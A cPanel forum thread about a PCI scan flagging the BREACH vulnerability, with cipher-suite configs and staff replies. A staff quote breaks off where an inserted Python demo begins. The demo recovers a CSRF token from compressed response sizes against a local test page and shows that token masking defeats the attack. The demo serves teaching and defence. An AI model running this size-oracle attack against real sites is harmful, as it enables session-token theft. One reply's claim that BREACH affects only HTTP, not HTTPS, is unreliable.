
BREACH vulnerability - CVE-2013-3587

Comments

8 comments

  • cPanelLauren
    Hi @vpswing, that's a pretty old vulnerability. I am curious whether you have made any customizations to your ciphers. What is the output of the following? cat /var/cpanel/conf/cpsrvd/main
  • vpswing
    [QUOTE]Hi @vpswing, that's a pretty old vulnerability. I am curious whether you have made any customizations to your ciphers. What is the output of the following? cat /var/cpanel/conf/cpsrvd/main[/QUOTE]

    It showed 'no such file or directory'
  • vpswing
    In the /etc/apache2/conf/httpd.conf file:

        SSLCipherSuite ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-SHA384:ECDHE-RSA-AES256-SHA384:ECDHE-ECDSA-AES128-SHA256:ECDHE-RSA-AES128-SHA256
        SSLProtocol TLSv1.2
        SSLPassPhraseDialog builtin
        SSLUseStapling On
        SSLStaplingCache shmcb:/run/apache2/stapling_cache_shmcb(256000)
        # Prevent browsers from failing if an OCSP server is temporarily broken.
        SSLStaplingReturnResponderErrors off
        SSLStaplingErrorCacheTimeout 60
        SSLStaplingFakeTryLater off
        SSLStaplingResponderTimeout 3
        SSLSessionCache shmcb:/run/apache2/ssl_gcache_data_shmcb(1024000)
        SSLSessionCache dbm:/run/apache2/ssl_gcache_data_dbm
        SSLSessionCacheTimeout 300
        Mutex file:/run/apache2 ssl-cache
        SSLRandomSeed startup builtin
        SSLRandomSeed connect builtin
  • cPanelLauren
    cPanel uses a different cipher suite for its own web server, cpsrvd, than Apache does. Can you go to WHM >> Service Configuration >> cPanel Web Services Configuration, click "Save", and then run the same command again? I ask because the default cipher list should be PCI compliant, and I am curious whether what you're using is older than the current default. You could also compare against the v88 defaults:

        ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:DHE-RSA-AES128-GCM-SHA256:DHE-RSA-AES256-GCM-SHA384
  • vpswing
    It now shows:

        ---
        SSLCipherList: ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:DHE-RSA-AES128-GCM-SHA256:DHE-RSA-AES256-GCM-SHA384
        SSLVersion: SSLv23:!SSLv2:!SSLv3:!TLSv1:!TLSv1_1
        VERSION: '1.2'

    Just a thought: from what I understand about the BREACH vulnerability, it can be mitigated by disabling TLS/SSL-level compression. Does the above cipher list disable TLS/SSL compression? (The previous time, when I ran the command 'cat /var/cpanel/conf/cpsrvd/main' and it showed file not found, what cipher list was the cPanel web service using then?) Thanks
  • cPanelLauren
    My goal was to rule out some old cipher or communication issue; yours are fine. BREACH is related to compression, but it is alarming that the PCI scanning company would flag this specific issue. As far as I was ever aware, the CVE only affects HTTP, not HTTPS, and all ports you noted only accept HTTPS communication. There was an old case on this, and here's what it had to say: [QUOTE]Our CSRF tokens should be enough to mitigate BREACH attacks since they are used on all pages with sensitive information. CSRF tokens are listed as a valid way to protect against this vuln on
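Added example (not code from this thread, from cPanel or from Apache) illustrating the two points raised above: the cipher list has no bearing on BREACH, because the attack uses HTTP-level compression (mod_deflate/gzip in Apache; TLS-level compression is a separate setting, SSLCompression, off by default since httpd 2.4.4), and an anti-CSRF token only helps if its text changes from response to response. The Python below builds a small constructed page with a token in a logout link and a reflected search term, compresses it with zlib the way a gzip-enabled server would, and recovers the token one hex character at a time purely from response sizes; the same attack fails against a per-response XOR-masked token. The page template, SECRET_TOKEN, ANCHOR, the alphabet and all function names are assumptions made for the demo. Z_FIXED is used so the size oracle is exact; real servers use dynamic Huffman tables, which add noise the attacker averages away with repeated requests but do not remove the leak.

```python
import html
import os
import zlib

# Everything below is a constructed demo, not cPanel's, Apache's or any
# scanner's code.  SECRET_TOKEN, ANCHOR and the page template are assumptions.
SECRET_TOKEN = "4fa3c09e7b1d25f8"  # 16 hex chars embedded in every response
ALPHABET = "0123456789abcdef"

# Bytes the attacker can predict immediately before the token.  36 bytes is
# chosen on purpose: every LZ77 match length the attack produces (36..52) then
# falls in one deflate length-code bucket (35..66), so with fixed Huffman
# codes a correct guess costs exactly one 8-bit literal less than a wrong one.
ANCHOR = "/account/settings/logout?csrf_token="


def render(token_text: str, query: str) -> bytes:
    """A page that carries an anti-CSRF token and reflects a search term.

    The reflected value is HTML-escaped, as on a well-written site; that does
    not help here because the attacker's guess needs no special characters."""
    page = (
        "<html><body>\n"
        f'<p><a href="{ANCHOR}{token_text}">Log out</a></p>\n'
        f"<p>No results for <b>{html.escape(query)}</b></p>\n"
        "</body></html>\n"
    )
    return page.encode()


def compressed_len(body: bytes) -> int:
    """Length of the body after HTTP-level (deflate) compression.

    Z_FIXED forces fixed Huffman tables so the size oracle is exact for the
    demo; dynamic tables (the production default) only add noise."""
    z = zlib.compressobj(9, zlib.DEFLATED, 15, 8, zlib.Z_FIXED)
    return len(z.compress(body) + z.flush())


def static_token_server(query: str) -> int:
    """Vulnerable server: the same token text in every compressed response."""
    return compressed_len(render(SECRET_TOKEN, query))


def mask_token(token_hex: str) -> str:
    """Masking mitigation: send mask || (token XOR mask) with a fresh mask."""
    token = bytes.fromhex(token_hex)
    mask = os.urandom(len(token))
    return mask.hex() + bytes(t ^ m for t, m in zip(token, mask)).hex()


def unmask_token(masked_hex: str) -> str:
    """Server-side check undoes the mask before comparing with the session."""
    data = bytes.fromhex(masked_hex)
    half = len(data) // 2
    mask, xored = data[:half], data[half:]
    return bytes(x ^ m for x, m in zip(xored, mask)).hex()


def masked_token_server(query: str) -> int:
    """Mitigated server: the token text differs in every response."""
    return compressed_len(render(mask_token(SECRET_TOKEN), query))


def guess_sizes(server, known: str) -> dict:
    """One BREACH round: response size for each candidate next character.

    The guess repeats the predictable text before the token plus the part
    already recovered; only a correct next character extends the back-reference
    and makes the response one byte shorter."""
    return {c: server(ANCHOR + known + c) for c in ALPHABET}


def recover_token(server, length: int = len(SECRET_TOKEN)) -> str:
    """Keep the candidate whose response compressed best, one character at a time."""
    known = ""
    for _ in range(length):
        sizes = guess_sizes(server, known)
        known += min(sizes, key=sizes.get)
    return known


if __name__ == "__main__":
    print("static token, round 1 sizes:", guess_sizes(static_token_server, ""))
    print("recovered from static token:", recover_token(static_token_server))
    print("recovered from masked token:", recover_token(masked_token_server))
```

Against static_token_server the first round shows fifteen candidates at one size and the correct character one byte smaller, and sixteen such rounds (256 requests) yield the token; against masked_token_server the size differences no longer correlate with the real token, while unmask_token still lets the server validate what it receives. Turning off compression for responses that carry secrets, or keeping attacker-controlled input and secrets out of the same response, removes the oracle entirely; changing the cipher list does not.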
  • vpswing
    Thank you Lauren! Appreciate your/cPanel's response to this issue. Best regards, Adrian
  • juanregres4
    How did you solve the problem to get certified?
